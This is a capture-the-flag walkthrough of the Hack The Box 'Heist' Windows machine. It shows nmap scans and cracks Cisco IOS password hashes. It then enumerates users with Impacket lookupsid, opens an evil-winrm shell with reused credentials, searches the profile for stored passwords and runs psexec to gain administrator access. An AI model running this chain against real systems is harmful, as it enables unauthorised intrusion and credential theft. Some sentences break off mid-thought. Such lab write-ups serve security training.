Heist is a easy windows box in the Hack The Box CTF series.
As usual I added 10.10.10.149 to etc/hosts as heist.htb.
I started with nmap port-scan using nmap -v -sV -sC -oN nmap.scan heist.htb command.
The NMAP result was as below:
➜ heist nmap -v -sV -sC -oN nmap.scan 10.10.10.149 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 13:15 +03 NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 13:15 Completed NSE at 13:15, 0.00s elapsed Initiating NSE at 13:15 Completed NSE at 13:15, 0.00s elapsed Initiating NSE at 13:15 Completed NSE at 13:15, 0.00s elapsed Initiating Ping Scan at 13:15 Scanning 10.10.10.149 [4 ports] Completed Ping Scan at 13:15, 0.39s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 13:15 Completed Parallel DNS resolution of 1 host. at 13:15, 0.05s elapsed Initiating SYN Stealth Scan at 13:15 Scanning 10.10.10.149 [1000 ports] Discovered open port 135/tcp on 10.10.10.149 Discovered open port 445/tcp on 10.10.10.149 Discovered open port 80/tcp on 10.10.10.149 Completed SYN Stealth Scan at 13:15, 24.33s elapsed (1000 total ports) Initiating Service scan at 13:15 Scanning 3 services on 10.10.10.149 Completed Service scan at 13:16, 20.01s elapsed (3 services on 1 host) NSE: Script scanning 10.10.10.149. Initiating NSE at 13:16 Completed NSE at 13:16, 40.08s elapsed Initiating NSE at 13:16 Completed NSE at 13:16, 1.06s elapsed Initiating NSE at 13:16 Completed NSE at 13:16, 0.00s elapsed Nmap scan report for 10.10.10.149 Host is up (0.27s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 | http-title: Support Login Page |_Requested resource was login.php 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 3s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-11-10T10:16:11 |_ start_date: N/A NSE: Script Post-scanning. Initiating NSE at 13:16 Completed NSE at 13:16, 0.00s elapsed Initiating NSE at 13:16 Completed NSE at 13:16, 0.00s elapsed Initiating NSE at 13:16 Completed NSE at 13:16, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 87.62 seconds Raw packets sent: 2014 (88.592KB) | Rcvd: 17 (732B) ➜ heist
NMAP revelead a couple of ports open, so the SMB (445) and IIS (80) are interesting here. Since the machine has SMB v2 installed, I’m not looking at it now, so I moved forward to look into webserver for enumeration.
Looking at the default webpage I found a website hosted on IIS, the webpage is a login page seems to be a login page to report issues. There is an option to login as
The attachment is just a txt file that contains running configuration of a cisco IOS with admin and a user -rout3r’s encrypted passwords.
version 12.2 no service pad service password-encryption ! isdn switch-type basic-5ess ! hostname ios-1 ! security passwords min-length 12 enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91 ! username rout3r password 7 0242114B0E143F015F5D1E161713 username admin privilege 15 password 7 02375012182C1A1D751618034F36415408 ! ! ip ssh authentication-retries 5 ip ssh version 2 ! ! router bgp 100 synchronization bgp log-neighbor-changes bgp dampening network 192.168.0.0Â mask 300.255.255.0 timers bgp 3 9 redistribute connected ! ip classless ip route 0.0.0.0 0.0.0.0 192.168.0.1 ! ! access-list 101 permit ip any any dialer-list 1 protocol ip list 101 ! no ip http server no ip http secure-server ! line vty 0 4 session-timeout 600 authorization exec SSH transport input ssh
It is very easy to decrypt CISCO 7 passwords these days, I used an online CISCO password decryptor to decrypt the encrypted password from the txt file in the attachment. But, we have a problem here, the type 5 password isn’t easy to decrypt, I had to use
As I now have all the passwords obtained, let me see where I can use it. For the users, I tried “rout3r” and “admin”, but those didn’t work, then I realized there was a user called “hazard” in the “issues” page. Now I’m going to try the user “hazard” against the SMB login. However, I logged in successfully, but I wasn’t able to list the shares, which my user hazard has no privilege to access.
➜ heist smbclient -U hazard%stealth1agent -L 10.10.10.149 Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.149 failed (Error NT_STATUS_IO_TIMEOUT) Failed to connect with SMB1 -- no workgroup available
I need to find more users in the box, I understood that, I need to use impaket for this purpose. Impacket has a script called lookupsid.py (https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py) that lists the users of the Windows machine if you have basic authentication user.
The script successfully listed me a numbr support users:
➜ heist python lookupsid.py hazard:email@example.com Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation [*] Brute forcing SIDs at heist.htb [*] StringBinding ncacn_np:heist.htb[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112 500: SUPPORTDESK\Administrator (SidTypeUser) 501: SUPPORTDESK\Guest (SidTypeUser) 503: SUPPORTDESK\DefaultAccount (SidTypeUser) 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser) 513: SUPPORTDESK\None (SidTypeGroup) 1008: SUPPORTDESK\Hazard (SidTypeUser) 1009: SUPPORTDESK\support (SidTypeUser) 1012: SUPPORTDESK\Chase (SidTypeUser) 1013: SUPPORTDESK\Jason (SidTypeUser) ➜ heist
Since I wasn’t able to do any further enum, I decided to use EvilWinRM (a Windows Remote Manager exploit) to see if I can get a user shell. For this, I need to make sure the port 5985 is open and running. The port 5985 is by default used to Windows RM.
➜ evil-winrm git:(master) nmap -p 5985 heist.htb Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 14:41 +03 Nmap scan report for heist.htb (10.10.10.149) Host is up (0.15s latency). PORT STATE SERVICE 5985/tcp open wsman Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds ➜ evil-winrm git:(master)
Ok, the port is open, now lets try the users I have enumerated and the password I found after the decryption of the Cisco IOS configuration.
After trying couple of users, the user Chase was able to get the user shell on the box Heist.
➜ evil-winrm git:(master) ruby evil-winrm.rb -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d' -i heist.htb Evil-WinRM shell v1.8 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Chase\Documents>
Here I got the user.txt
➜ evil-winrm git:(master) ruby evil-winrm.rb -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d' -i heist.htb Evil-WinRM shell v1.8 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Chase\Documents> cd .. *Evil-WinRM* PS C:\Users\Chase> cd Desktop *Evil-WinRM* PS C:\Users\Chase\Desktop> dir Directory: C:\Users\Chase\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/22/2019 9:08 AM 121 todo.txt -a---- 4/22/2019 9:07 AM 32 user.txt *Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt a127dae[---------]95f59c4 *Evil-WinRM* PS C:\Users\Chase\Desktop>
There are couple of ways to privesc in this box, I’m going with the intended one that is obtaining the password stored in the Firefox user profile.
So, first I will have to change the directory to the C:\Users\Chase\Appdata\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\sessionstore-backups
Using this PowerShell command:
Get-ChildItem -Path $Env:USERPROFILE -Recurse -File | Select-String password
After few initial fails, I have the password for admin:
The next step, I will use the password psexec script from Impacket and I get the Root.txt
➜ heist python psexec.py firstname.lastname@example.org Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation Password: [*] Requesting shares on heist.htb..... [*] Found writable share ADMIN$ [*] Uploading file nLvdvvMS.exe [*] Opening SVCManager on heist.htb..... [*] Creating service ZqjZ on heist.htb..... [*] Starting service ZqjZ..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.437] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>cd / C:\>cd Users/Administrator/Desktop C:\Users\Administrator\Desktop>ls 'ls' is not recognized as an internal or external command, operable program or batch file. C:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is 78E3-E62D Directory of C:\Users\Administrator\Desktop 04/22/2019 09:05 AM <DIR> . 04/22/2019 09:05 AM <DIR> .. 04/22/2019 09:05 AM 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 7,839,940,608 bytes free C:\Users\Administrator\Desktop>type root.txt 50dfa3[-----------------]3d766897 C:\Users\Administrator\Desktop>